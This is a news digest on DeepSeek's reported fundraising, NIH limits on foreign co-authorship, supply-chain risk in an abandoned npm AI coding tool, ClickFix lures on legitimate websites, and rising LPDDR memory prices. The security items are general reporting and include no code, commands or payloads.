Today’s through-line is control. DeepSeek is reportedly trying to prove that open models and serious capital can coexist, while NIH, npm maintainers, and security teams are all dealing with the opposite problem: who gets to publish, push updates, or borrow institutional trust at scale.
A reported $10 billion round, with caveats
Bloomberg Law reported on May 22 that DeepSeek is advancing a 70 billion yuan, about $10 billion, financing round, and that founder Liang Wenfeng told investors the company would keep developing open-source AI models while pursuing AGI. That would be a large statement of intent, not just a large check. The catch is that DeepSeek has not publicly confirmed the round on its official channels, so the headline claim still rests on third-party reporting.
Earlier coverage points to a moving target, not a settled number. CnTechPost, citing The Information on May 8, said DeepSeek was seeking up to 50 billion yuan, or $7.35 billion; TechCrunch reported on May 6 that the company’s prospective valuation had risen from $20 billion to $45 billion in a few weeks. The clean read is not that DeepSeek has closed a $10 billion round. It is that the fundraising story is expanding quickly, while observers are already drawing a harder line on proof: not investor rhetoric, but whether DeepSeek keeps releasing useful open weights at that pace.
NIH restrictions appear to reach into publication
The most consequential part of the U.S. research-security push may now be happening through grant administration rather than public rulemaking. Inside Higher Ed, summarizing Science’s reporting on May 22, said NIH officials have told some grantees to seek advance permission for co-authorship with a scholar affiliated with a foreign institution, even when the work was done in the United States. The same report said NIH ordered grantees to remove from annual progress reports publications with foreign-affiliated coauthors if NIH had not previously approved a foreign component for the grant.
There is official policy underneath this, but not a public agency notice matching the coauthor language. NIH’s May 1, 2025 notice said it would no longer issue awards that include a foreign subaward under the parent grant, and would no longer accept requests to add a new foreign component or subaward to an ongoing project, according to the NIH grants notice. A later NIH notice on September 12, 2025 said the agency still supports international collaborations, but through new PF5/UF5 mechanisms. The key detail is on an NIH NINDS guidance page, which says collaborations with investigators at a foreign site anticipated to result in co-authorship may qualify as a foreign component.
NIH’s public posture is narrower than the alarmed interpretation. Per Inside Higher Ed, an NIH spokesperson said a recent update to IDeA grantees was a clarification of longstanding policy, not a new directive, and that IDeA funding has always barred foreign institutions and foreign components. That may be true programmatically, but it does not make the effect smaller. STAT reported on March 27 that 25% of nearly 1,000 NIH-supported scientists surveyed said the foreign-subaward shift had affected their research a great deal or a fair amount, and another 20% said they were affected a little. Science works on co-authorship first and compliance diagrams second. The agencies seem to be trying the reverse.
A viral coding tool becomes an npm warning
A popular AI coding tool is now a supply-chain cautionary tale. The maintainer of open-gsd/get-shit-done-redux wrote on GitHub on May 22 that the original GSD project had been abandoned after an apparent crypto rug pull, and that the community had forked the codebase to keep it alive. The bigger issue is control of distribution. The warning that drove the story says the original creator still has publish access to the old npm packages, which means a future update could turn a widely installed coding agent into a backdoor on developer machines with shell access.
The replacement project has at least done the obvious hygiene. In its Security Audit Transparency Report dated 2026-05-22, the new team said it found no confirmed active exfiltration payload in the tracked source during that pass, reported 0 known vulnerabilities in the root and SDK at scan time, and said its security tests passed 293 out of 293. That is useful, but it is not the whole risk model. The old package line is the problem, because trust in agent tooling is less about one repo snapshot than about who can ship the next update. AI coding agents ask for deep local permissions. npm has always been a supply-chain problem; now the package also talks back.
Real domains are now part of the malware pitch
A widely shared report alleged that roughly 140 legitimate websites, including pages on Harvard International Review, were being used to deliver ClickFix prompts. That count is not broadly confirmed, and Harvard’s public materials reviewed here do not confirm a compromise. AI Weekly reported the Harvard-linked pages and the 140-site figure, but the firmer point is narrower and more useful: the alleged examples were real, trusted domains, not obvious spoofs.
The mechanism matters more than the headline. Huntress explains that ClickFix is a social-engineering technique in which victims are told to open the Windows Run box, paste clipboard contents, and execute them, and that delivery can happen through compromised websites as well as phishing. That also corrects a common shorthand: ClickFix is not one malware family. It is a way to get users to run whatever payload the operator wants. The useful security assumption that a trusted domain buys you safety is getting weaker. In decentralized environments, especially universities with lots of third-level or outsourced sites, it was not especially strong to begin with.
LPDDR gets pulled into the data center
The AI memory squeeze is no longer confined to HBM. Official materials from Micron and Samsung show LPDDR5X and SOCAMM2 being positioned for AI infrastructure, not just phones and thin laptops, while Samsung’s 1Q 2026 earnings deck says it plans to expand the share of high-value-added AI products amid limited supply and industry-wide price increases. That is the supply-side story in plain English: memory makers are following margin.
The downstream effect is now visible. TrendForce said on May 14 that LPDDR4X average selling prices in 2Q26 were up 70% to 75% quarter over quarter, and LPDDR5X was up 78% to 83%. IDC said some new devices will ship with less memory than consumers are used to at the same price points, which is the more likely form of repricing. The sticker does not always move first. The spec sheet gets thinner.
The common theme is not AI magic. It is gatekeeping, over capital, dependencies, infrastructure, and who is allowed in the author list.